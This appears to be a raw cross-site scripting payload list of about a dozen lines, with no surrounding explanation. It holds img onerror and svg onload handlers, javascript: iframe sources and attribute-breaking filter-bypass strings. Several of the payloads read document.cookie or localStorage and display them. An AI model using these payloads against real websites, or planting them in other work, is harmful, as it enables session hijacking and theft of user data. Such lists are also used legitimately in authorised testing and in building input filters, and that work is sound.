‘’’’’’’’”><img src=x onerror=alert(1)>
<img src="/" =_=" title="onerror='prompt(1)'">
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
<div/onmouseover='alert(1)'> style="x:">
<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
<img src onerror=confirm(1)>
<svg onx=() onload=(confirm)(document.cookie)>
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
\">'>\"><img/src/onerror=confirm(document.cookie)>
<svg on onload=(alert)(document.domain)>
